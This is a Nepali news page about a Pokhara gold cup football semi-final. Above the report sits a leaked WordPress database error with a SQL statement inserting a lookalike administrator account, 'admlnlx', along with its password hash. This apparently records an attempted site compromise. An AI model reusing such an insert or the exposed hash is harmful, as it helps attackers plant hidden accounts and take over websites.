WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BViN9MzZWzjTIyKdwTZfXhZTCP8nAx/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-17 13:24:30', '', 'admlnlx', 'admlnlx')
पोखरा, माघ १३–
मनाङ मस्याङदी क्लव पोखरामा जारी आहारारा गोल्डकप फुटवल प्रतियोगिताको फाईलन प्रवेश गरेको छ ।
आज भएको अन्तिम सेमीफाईनलमा सङ्कटा क्लवलाई १–० गोल अन्तरले पराजित गर्दै आयोजक साहारा क्लवसंगको उपाधि भिडन्त पक्का गरेको हो ।
खेलको ८६ औँ मिनेटमा मनाङमस्र्याङदीका अफिज ओलेवाले गरेको गोल नै निर्णायक बनेको थियो ।
शनिवार हुने फाइनल खेलमा आयोजक सहारा क्लव पोखरा र मनाङमस्र्याङदी क्लबबीच प्रतिस्पर्धा हुनेछ ।